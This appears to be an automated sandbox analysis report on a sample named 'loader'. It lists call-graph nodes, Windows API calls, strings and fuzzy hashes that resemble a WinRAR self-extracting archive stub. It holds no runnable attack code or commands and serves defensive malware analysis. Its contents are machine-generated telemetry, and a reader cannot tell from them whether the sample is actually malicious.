1284de _free 20 API calls 23417->23418 23420 12bbfb 23418->23420 23419->23417 23421 12a6ca 11 API calls 23419->23421 23420->23410 23421->23419 23422->23404 23423->23407 23424->23407 23426 11f033 GetStartupInfoW 23425->23426 23426->23261 23428 12b2a2 23427->23428 23429 12b299 23427->23429 23428->23266 23432 12b188 23429->23432 23431->23266 23433 128fa5 pre_c_initialization 38 API calls 23432->23433 23434 12b195 23433->23434 23452 12b2ae 23434->23452 23436 12b19d 23461 12af1b 23436->23461 23439 12b1b4 23439->23428 23440 128518 __vswprintf_c_l 21 API calls 23441 12b1c5 23440->23441 23442 12b1f7 23441->23442 23468 12b350 23441->23468 23444 1284de 
_free 20 API calls 23442->23444 23444->23439 23446 12b1f2 23478 12895a 20 API calls __dosmaperr 23446->23478 23448 12b23b 23448->23442 23479 12adf1 26 API calls 23448->23479 23449 12b20f 23449->23448 23450 1284de _free 20 API calls 23449->23450 23450->23448 23453 12b2ba ___scrt_is_nonwritable_in_current_image 23452->23453 23454 128fa5 pre_c_initialization 38 API calls 23453->23454 23455 12b2c4 23454->23455 23458 12b348 ___scrt_is_nonwritable_in_current_image 23455->23458 23460 1284de _free 20 API calls 23455->23460 23480 128566 38 API calls _abort 23455->23480 23481 12a3f1 EnterCriticalSection 23455->23481 23482 12b33f LeaveCriticalSection _abort 23455->23482 23458->23436 23460->23455 23462 123dd6 __fassign 38 API calls 23461->23462 23463 12af2d 23462->23463 23464 12af4e 23463->23464 23465 12af3c GetOEMCP 23463->23465 23466 12af65 23464->23466 23467 12af53 GetACP 23464->23467 23465->23466 23466->23439 23466->23440 23467->23466 23469 12af1b 40 API calls 23468->23469 23470 12b36f 23469->23470 23473 12b3c0 IsValidCodePage 23470->23473 23475 12b376 23470->23475 23477 12b3e5 ___scrt_fastfail 23470->23477 23471 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23472 12b1ea 23471->23472 23472->23446 23472->23449 23474 12b3d2 GetCPInfo 23473->23474 23473->23475 23474->23475 23474->23477 23475->23471 23483 12aff4 GetCPInfo 23477->23483 23478->23442 23479->23442 23481->23455 23482->23455 23484 12b0d8 23483->23484 23489 12b02e 23483->23489 23486 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23484->23486 23488 12b184 23486->23488 23488->23475 23493 12c099 23489->23493 23492 12a275 __vswprintf_c_l 43 API calls 23492->23484 23494 123dd6 __fassign 38 API calls 23493->23494 23495 12c0b9 MultiByteToWideChar 23494->23495 23497 12c18f 23495->23497 23498 12c0f7 23495->23498 23499 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23497->23499 23500 128518 __vswprintf_c_l 21 API calls 23498->23500 23503 12c118 
__vsnwprintf_l ___scrt_fastfail 23498->23503 23501 12b08f 23499->23501 23500->23503 23507 12a275 23501->23507 23502 12c189 23512 12a2c0 20 API calls _free 23502->23512 23503->23502 23505 12c15d MultiByteToWideChar 23503->23505 23505->23502 23506 12c179 GetStringTypeW 23505->23506 23506->23502 23508 123dd6 __fassign 38 API calls 23507->23508 23509 12a288 23508->23509 23513 12a058 23509->23513 23512->23497 23515 12a073 __vswprintf_c_l 23513->23515 23514 12a099 MultiByteToWideChar 23516 12a0c3 23514->23516 23517 12a24d 23514->23517 23515->23514 23522 128518 __vswprintf_c_l 21 API calls 23516->23522 23524 12a0e4 __vsnwprintf_l 23516->23524 23518 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23517->23518 23519 12a260 23518->23519 23519->23492 23520 12a199 23549 12a2c0 20 API calls _free 23520->23549 23521 12a12d MultiByteToWideChar 23521->23520 23523 12a146 23521->23523 23522->23524 23540 12a72c 23523->23540 23524->23520 23524->23521 23528 12a170 23528->23520 23531 12a72c __vswprintf_c_l 11 API calls 23528->23531 23529 12a1a8 23530 128518 __vswprintf_c_l 21 API calls 23529->23530 23534 12a1c9 __vsnwprintf_l 23529->23534 23530->23534 23531->23520 23532 12a23e 23548 12a2c0 20 API calls _free 23532->23548 23534->23532 23535 12a72c __vswprintf_c_l 11 API calls 23534->23535 23536 12a21d 23535->23536 23536->23532 23537 12a22c WideCharToMultiByte 23536->23537 23537->23532 23538 12a26c 23537->23538 23550 12a2c0 20 API calls _free 23538->23550 23541 12a458 pre_c_initialization 5 API calls 23540->23541 23542 12a753 23541->23542 23545 12a75c 23542->23545 23551 12a7b4 10 API calls 3 library calls 23542->23551 23544 12a79c LCMapStringW 23544->23545 23546 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23545->23546 23547 12a15d 23546->23547 23547->23520 23547->23528 23547->23529 23548->23520 23549->23517 23550->23520 23551->23544 23553 11e360 23552->23553 23554 1100d9 GetModuleHandleW 23553->23554 23555 1100f0 GetProcAddress 
23554->23555 23556 110154 23554->23556 23557 110121 GetProcAddress 23555->23557 23558 110109 23555->23558 23559 110484 GetModuleFileNameW 23556->23559 23652 1270dd 42 API calls __vsnwprintf_l 23556->23652 23557->23556 23560 110133 23557->23560 23558->23557 23572 1104a3 23559->23572 23560->23556 23562 1103be 23562->23559 23563 1103c9 GetModuleFileNameW CreateFileW 23562->23563 23564 110478 CloseHandle 23563->23564 23565 1103fc SetFilePointer 23563->23565 23564->23559 23565->23564 23566 11040c ReadFile 23565->23566 23566->23564 23569 11042b 23566->23569 23569->23564 23571 110085 2 API calls 23569->23571 23570 1104d2 CompareStringW 23570->23572 23571->23569 23572->23570 23573 110508 GetFileAttributesW 23572->23573 23574 110520 23572->23574 23643 10acf5 23572->23643 23646 110085 23572->23646 23573->23572 23573->23574 23575 11052a 23574->23575 23578 110560 23574->23578 23577 110542 GetFileAttributesW 23575->23577 23579 11055a 23575->23579 23576 11066f 23600 119da4 GetCurrentDirectoryW 23576->23600 23577->23575 23577->23579 23578->23576 23580 10acf5 GetVersionExW 23578->23580 23579->23578 23581 11057a 23580->23581 23582 110581 23581->23582 23583 1105e7 23581->23583 23585 110085 2 API calls 23582->23585 23584 10400a _swprintf 51 API calls 23583->23584 23586 11060f AllocConsole 23584->23586 23587 11058b 23585->23587 23589 110667 ExitProcess 23586->23589 23590 11061c GetCurrentProcessId AttachConsole 23586->23590 23588 110085 2 API calls 23587->23588 23591 110595 23588->23591 23656 1235b3 23590->23656 23653 10ddd1 23591->23653 23594 11063d GetStdHandle WriteConsoleW Sleep FreeConsole 23594->23589 23596 10400a _swprintf 51 API calls 23597 1105c3 23596->23597 23598 10ddd1 53 API calls 23597->23598 23599 1105d2 23598->23599 23599->23589 23600->23271 23602 110085 2 API calls 23601->23602 23603 11a349 OleInitialize 23602->23603 23604 11a36c GdiplusStartup SHGetMalloc 23603->23604 23604->23273 23606 1113d7 IsDBCSLeadByte 23605->23606 23606->23606 23607 1113ef 23606->23607 
23607->23275 23609 11ae15 23608->23609 23610 11ae0e 23608->23610 23612 11ae1b GetObjectW 23609->23612 23613 11ae2a 23609->23613 23686 119e1c FindResourceW 23610->23686 23612->23613 23681 119d1a 23613->23681 23615 11ae80 23627 10d31c 23615->23627 23617 11ae5c 23702 119d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23617->23702 23618 119e1c 13 API calls 23620 11ae4d 23618->23620 23620->23617 23622 11ae53 DeleteObject 23620->23622 23621 11ae64 23703 119d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23621->23703 23622->23617 23624 11ae6d 23704 119f5d 8 API calls ___scrt_fastfail 23624->23704 23626 11ae74 DeleteObject 23626->23615 23715 10d341 23627->23715 23629 10d328 23755 10da4e GetModuleHandleW FindResourceW 23629->23755 23632 118835 23841 11e24a 23632->23841 23636 11a3cc GdiplusShutdown CoUninitialize 23635->23636 23636->23313 23638->23282 23639->23298 23640->23277 23641->23303 23642->23312 23644 10ad09 GetVersionExW 23643->23644 23645 10ad45 23643->23645 23644->23645 23645->23572 23647 11e360 23646->23647 23648 110092 GetSystemDirectoryW 23647->23648 23649 1100c8 23648->23649 23650 1100aa 23648->23650 23649->23572 23651 1100bb LoadLibraryW 23650->23651 23651->23649 23652->23562 23658 10ddff 23653->23658 23657 1235bb 23656->23657 23657->23594 23657->23657 23664 10d28a 23658->23664 23661 10de22 LoadStringW 23662 10ddfc 23661->23662 23663 10de39 LoadStringW 23661->23663 23662->23596 23663->23662 23669 10d1c3 23664->23669 23666 10d2a7 23668 10d2bc 23666->23668 23677 10d2c8 26 API calls 23666->23677 23668->23661 23668->23662 23670 10d1de 23669->23670 23676 10d1d7 _strncpy 23669->23676 23672 10d202 23670->23672 23678 111596 WideCharToMultiByte 23670->23678 23675 10d233 23672->23675 23679 10dd6b 50 API calls __vsnprintf 23672->23679 23680 1258d9 26 API calls 3 library calls 23675->23680 23676->23666 23677->23668 23678->23672 23679->23675 23680->23676 23705 119d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23681->23705 23683 119d21 23684 119d2d 23683->23684 23706 
119d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23683->23706 23684->23615 23684->23617 23684->23618 23687 119e70 23686->23687 23688 119e3e SizeofResource 23686->23688 23687->23609 23688->23687 23689 119e52 LoadResource 23688->23689 23689->23687 23690 119e63 LockResource 23689->23690 23690->23687 23691 119e77 GlobalAlloc 23690->23691 23691->23687 23692 119e92 GlobalLock 23691->23692 23693 119f21 GlobalFree 23692->23693 23694 119ea1 __vsnwprintf_l 23692->23694 23693->23687 23695 119ea9 CreateStreamOnHGlobal 23694->23695 23696 119ec1 23695->23696 23697 119f1a GlobalUnlock 23695->23697 23707 119d7b GdipAlloc 23696->23707 23697->23693 23700 119f05 23700->23697 23701 119eef GdipCreateHBITMAPFromBitmap 23701->23700 23702->23621 23703->23624 23704->23626 23705->23683 23706->23684 23708 119d8d 23707->23708 23709 119d9a 23707->23709 23711 119b0f 23708->23711 23709->23697 23709->23700 23709->23701 23712 119b30 GdipCreateBitmapFromStreamICM 23711->23712 23713 119b37 GdipCreateBitmapFromStream 23711->23713 23714 119b3c 23712->23714 23713->23714 23714->23709 23716 10d34b _wcschr __EH_prolog 23715->23716 23717 10d37a GetModuleFileNameW 23716->23717 23718 10d3ab 23716->23718 23719 10d394 23717->23719 23757 1099b0 23718->23757 23719->23718 23722 10d407 23768 125a90 26 API calls 3 library calls 23722->23768 23725 113781 76 API calls 23727 10d3db 23725->23727 23726 10d41a 23769 125a90 26 API calls 3 library calls 23726->23769 23727->23722 23727->23725 23739 10d627 23727->23739 23729 10d563 23729->23739 23794 109d30 77 API calls 23729->23794 23733 10d57d ___std_exception_copy 23734 109bf0 80 API calls 23733->23734 23733->23739 23737 10d5a6 ___std_exception_copy 23734->23737 23736 10d42c 23736->23729 23736->23739 23770 109e40 23736->23770 23785 109bf0 23736->23785 23793 109d30 77 API calls 23736->23793 23737->23739 23752 10d5b2 ___std_exception_copy 23737->23752 23795 11137a MultiByteToWideChar 23737->23795 23778 109653 23739->23778 23740 10d72b 23796 10ce72 76 API calls 
23740->23796 23742 10da0a 23801 10ce72 76 API calls 23742->23801 23744 10d9fa 23744->23629 23745 10d771 23797 125a90 26 API calls 3 library calls 23745->23797 23747 10d742 23747->23745 23749 113781 76 API calls 23747->23749 23748 10d78b 23798 125a90 26 API calls 3 library calls 23748->23798 23749->23747 23751 111596 WideCharToMultiByte 23751->23752 23752->23739 23752->23740 23752->23742 23752->23744 23752->23751 23799 10dd6b 50 API calls __vsnprintf 23752->23799 23800 1258d9 26 API calls 3 library calls 23752->23800 23756 10d32f 23755->23756 23756->23632 23758 1099ba 23757->23758 23759 109a39 CreateFileW 23758->23759 23760 109a59 GetLastError 23759->23760 23765 109aaa 23759->23765 23761 10b66c 2 API calls 23760->23761 23762 109a79 23761->23762 23762->23765 23766 109a7d CreateFileW GetLastError 23762->23766 23763 109ac7 SetFileTime 23764 109ae1 23763->23764 23764->23727 23765->23763 23765->23764 23767 109aa1 23766->23767 23767->23765 23768->23726 23769->23736 23771 109e53 23770->23771 23772 109e64 SetFilePointer 23770->23772 23775 109e9d 23771->23775 23802 106fa5 75 API calls 23771->23802 23773 109e82 GetLastError 23772->23773 23772->23775 23773->23775 23776 109e8c 23773->23776 23775->23736 23776->23775 23803 106fa5 75 API calls 23776->23803 23779 109677 23778->23779 23780 109688 23778->23780 23779->23780 23781 109683 23779->23781 23782 10968a 23779->23782 23780->23629 23804 109817 23781->23804 23809 1096d0 23782->23809 23786 109bfc 23785->23786 23789 109c03 23785->23789 23786->23736 23788 109c9e 23788->23786 23836 106f6b 75 API calls 23788->23836 23789->23786 23789->23788 23791 109cc0 23789->23791 23824 10984e 23789->23824 23791->23786 23792 10984e 5 API calls 23791->23792 23792->23791 23793->23736 23794->23733 23795->23752 23796->23747 23797->23748 23798->23739 23799->23752 23800->23752 23801->23744 23802->23772 23803->23775 23805 109820 23804->23805 23806 109824 23804->23806 23805->23780 23806->23805 23815 10a12d 23806->23815 23810 1096dc 23809->23810 23811 
1096fa 23809->23811 23810->23811 23813 1096e8 CloseHandle 23810->23813 23812 109719 23811->23812 23823 106e3e 74 API calls 23811->23823 23812->23780 23813->23811 23816 11e360 23815->23816 23817 10a13a DeleteFileW 23816->23817 23818 10984c 23817->23818 23819 10a14d 23817->23819 23818->23780 23820 10b66c 2 API calls 23819->23820 23821 10a161 23820->23821 23821->23818 23822 10a165 DeleteFileW 23821->23822 23822->23818 23823->23812 23825 109867 ReadFile 23824->23825 23826 10985c GetStdHandle 23824->23826 23827 109880 23825->23827 23833 1098a0 23825->23833 23826->23825 23837 109989 23827->23837 23829 109887 23830 1098b7 23829->23830 23831 1098a8 GetLastError 23829->23831 23832 109895 23829->23832 23830->23833 23835 1098c7 GetLastError 23830->23835 23831->23830 23831->23833 23834 10984e GetFileType 23832->23834 23833->23789 23834->23833 23835->23832 23835->23833 23836->23786 23838 109992 GetFileType 23837->23838 23839 10998f 23837->23839 23840 1099a0 23838->23840 23839->23829 23840->23829 23843 11e24f ___std_exception_copy 23841->23843 23842 118854 23842->23297 23843->23842 23847 1271ad 7 API calls 2 library calls 23843->23847 23848 11ecce RaiseException CallUnexpected new 23843->23848 23849 11ecb1 RaiseException Concurrency::cancel_current_task CallUnexpected 23843->23849 23847->23843 23851 127430 _abort 23850->23851 23852 127448 23851->23852 23853 12757e _abort GetModuleHandleW 23851->23853 23872 12a3f1 EnterCriticalSection 23852->23872 23855 12743c 23853->23855 23855->23852 23884 1275c2 GetModuleHandleExW 23855->23884 23859 127537 23893 131a19 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23859->23893 23860 12750b 23876 12753d 23860->23876 23864 1281f1 _abort 5 API calls 23869 1274dd 23864->23869 23865 1281f1 _abort 5 API calls 23870 1274ee 23865->23870 23866 127450 23867 1274c5 23866->23867 23866->23870 23892 127f30 20 API calls _abort 23866->23892 23867->23864 23867->23869 23869->23865 23873 12752e 23870->23873 23872->23866 23894 12a441 

              Control-flow Graph

              APIs
                • Part of subcall function 001100CF: GetModuleHandleW.KERNEL32(kernel32), ref: 001100E4
                • Part of subcall function 001100CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001100F6
                • Part of subcall function 001100CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00110127
                • Part of subcall function 00119DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00119DAC
                • Part of subcall function 0011A335: OleInitialize.OLE32(00000000), ref: 0011A34E
                • Part of subcall function 0011A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0011A385
                • Part of subcall function 0011A335: SHGetMalloc.SHELL32(00148430), ref: 0011A38F
                • Part of subcall function 001113B3: GetCPInfo.KERNEL32(00000000,?), ref: 001113C4
                • Part of subcall function 001113B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 001113D8
              • GetCommandLineW.KERNEL32 ref: 0011D61C
              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0011D643
              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0011D654
              • UnmapViewOfFile.KERNEL32(00000000), ref: 0011D68E
                • Part of subcall function 0011D287: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0011D29D
                • Part of subcall function 0011D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0011D2D9
              • CloseHandle.KERNEL32(00000000), ref: 0011D697
              • GetModuleFileNameW.KERNEL32(00000000,0015DC90,00000800), ref: 0011D6B2
              • SetEnvironmentVariableW.KERNEL32(sfxname,0015DC90), ref: 0011D6BE
              • GetLocalTime.KERNEL32(?), ref: 0011D6C9
              • _swprintf.LIBCMT ref: 0011D708
              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0011D71A
              • GetModuleHandleW.KERNEL32(00000000), ref: 0011D721
              • LoadIconW.USER32(00000000,00000064), ref: 0011D738
              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0011D789
              • Sleep.KERNEL32(?), ref: 0011D7B7
              • DeleteObject.GDI32 ref: 0011D7F0
              • DeleteObject.GDI32(?), ref: 0011D800
              • CloseHandle.KERNEL32 ref: 0011D843
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
              • API String ID: 788466649-3743209390
              • Opcode ID: d914b1aebfa860b5b71aaa1145fb5e2bab728657dc241b377559f5146321b24c
              • Instruction ID: fd370f7327e9ce470f8dc48fc8b7ad4d38274da9c5247511df8f10156f42ca1d
              • Opcode Fuzzy Hash: d914b1aebfa860b5b71aaa1145fb5e2bab728657dc241b377559f5146321b24c
              • Instruction Fuzzy Hash: 64610471904301EFD328AFB5EC49FAB3BE8AB55701F040439F945A65A1DBB8D9C4C7A2

              Control-flow Graph

              APIs
              • FindResourceW.KERNEL32(0011AE4D,PNG,?,?,?,0011AE4D,00000066), ref: 00119E2E
              • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0011AE4D,00000066), ref: 00119E46
              • LoadResource.KERNEL32(00000000,?,?,?,0011AE4D,00000066), ref: 00119E59
              • LockResource.KERNEL32(00000000,?,?,?,0011AE4D,00000066), ref: 00119E64
              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0011AE4D,00000066), ref: 00119E82
              • GlobalLock.KERNEL32(00000000), ref: 00119E93
              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00119EB7
              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00119EFC
              • GlobalUnlock.KERNEL32(00000000), ref: 00119F1B
              • GlobalFree.KERNEL32(00000000), ref: 00119F22
              Strings
              Similarity
              • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
              • String ID: PNG
              • API String ID: 3656887471-364855578
              • Opcode ID: a9f7049c7b7f492d55511dd958b2cef3f04accb4f2c37b16ad619646d881dbe6
              • Instruction ID: f09532fb935e1275a23162b8c26411b1ffd8c9c3595d8ef567888e21b56cb1d8
              • Opcode Fuzzy Hash: a9f7049c7b7f492d55511dd958b2cef3f04accb4f2c37b16ad619646d881dbe6
              • Instruction Fuzzy Hash: 4231C275204702AFC7159F21EC589ABBFADFF89751B040538F922D2660DB71DC81CBA5

              Control-flow Graph

              APIs
              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0010A4EF,000000FF,?,?), ref: 0010A628
              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0010A4EF,000000FF,?,?), ref: 0010A65E
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0010A4EF,000000FF,?,?), ref: 0010A66A
              • FindNextFileW.KERNEL32(?,?,?,?,?,?,0010A4EF,000000FF,?,?), ref: 0010A692
              • GetLastError.KERNEL32(?,?,?,?,0010A4EF,000000FF,?,?), ref: 0010A69E
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: FileFind$ErrorFirstLast$Next
              • String ID:
              • API String ID: 869497890-0
              • Opcode ID: b484f726ab5333a8066ae9ae1dea640a76ee7ca541b5246a6579cd732318e2c7
              • Instruction ID: c38891dc0c0d37ed008de54e3e186bcd362c04d40a20419700a625128f6e9b40
              • Opcode Fuzzy Hash: b484f726ab5333a8066ae9ae1dea640a76ee7ca541b5246a6579cd732318e2c7
              • Instruction Fuzzy Hash: 34416172504341AFC324EF68C884ADAF7F8BF58350F440A2AF5E9D3240D7B5A9948B92
              APIs
              • GetCurrentProcess.KERNEL32(00000000,?,00127513,00000000,0013BAD8,0000000C,0012766A,00000000,00000002,00000000), ref: 0012755E
              • TerminateProcess.KERNEL32(00000000,?,00127513,00000000,0013BAD8,0000000C,0012766A,00000000,00000002,00000000), ref: 00127565
              • ExitProcess.KERNEL32 ref: 00127577
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: 0fea27aabb4f9ee718d62902cc1c05da50d79f4f3c35e37877c8481aa2dff280
              • Instruction ID: d36e6b1bcc2c496b2806dba6a522c7491cf8126ac2cf62f53c75fd38f4765a39
              • Opcode Fuzzy Hash: 0fea27aabb4f9ee718d62902cc1c05da50d79f4f3c35e37877c8481aa2dff280
              • Instruction Fuzzy Hash: 41E0EC31004958AFCF11AF64ED09A4ABF69EF50742F108414F9158A672CB35DEA2CB54
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog_memcmp
              • String ID:
              • API String ID: 3004599000-0
              • Opcode ID: ec7ad05abe0155db142afead80b4a377a66a027473fdd7f62210b217ea03fe77
              • Instruction ID: 1a010c837b2ecda2159e0f7b086a01f9f4dfe0619952c3ac1f29793911ee5320
              • Opcode Fuzzy Hash: ec7ad05abe0155db142afead80b4a377a66a027473fdd7f62210b217ea03fe77
              • Instruction Fuzzy Hash: 38821B70908245AEDF25DF74C895BFAB7B9AF15300F0841B9E8D99B1C3DBB15A48CB60
              APIs
              • __EH_prolog.LIBCMT ref: 0011AEE5
                • Part of subcall function 0010130B: GetDlgItem.USER32(00000000,00003021), ref: 0010134F
                • Part of subcall function 0010130B: SetWindowTextW.USER32(00000000,001335B4), ref: 00101365
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prologItemTextWindow
              • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
              • API String ID: 810644672-8108337
              • Opcode ID: bc5cfa184d6b37b1180f57e6de2a7797a2e68ece8545dedad6502743266994f7
              • Instruction ID: 14f4115168dd468fa1089cd34dc95693a14a0858eaca28f5f78dd91fe75199b6
              • Opcode Fuzzy Hash: bc5cfa184d6b37b1180f57e6de2a7797a2e68ece8545dedad6502743266994f7
              • Instruction Fuzzy Hash: 9D420674948354BEEB29ABB09CCAFFE7B7CAB16701F440064F645A64E1CBB449C4CB61

              Control-flow Graph

              APIs
              • GetModuleHandleW.KERNEL32(kernel32), ref: 001100E4
              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001100F6
              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00110127
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001103D4
              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001103F0
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00110402
              • ReadFile.KERNEL32(00000000,?,00007FFE,00133BA4,00000000), ref: 00110421
              • CloseHandle.KERNEL32(00000000), ref: 00110479
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0011048F
              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 001104E7
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00110510
              • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0011054A
                • Part of subcall function 00110085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001100A0
                • Part of subcall function 00110085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0010EB86,Crypt32.dll,00000000,0010EC0A,?,?,0010EBEC,?,?,?), ref: 001100C2
              • _swprintf.LIBCMT ref: 001105BE
              • _swprintf.LIBCMT ref: 0011060A
                • Part of subcall function 0010400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0010401D
              • AllocConsole.KERNEL32 ref: 00110612
              • GetCurrentProcessId.KERNEL32 ref: 0011061C
              • AttachConsole.KERNEL32(00000000), ref: 00110623
              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00110649
              • WriteConsoleW.KERNEL32(00000000), ref: 00110650
              • Sleep.KERNEL32(00002710), ref: 0011065B
              • FreeConsole.KERNEL32 ref: 00110661
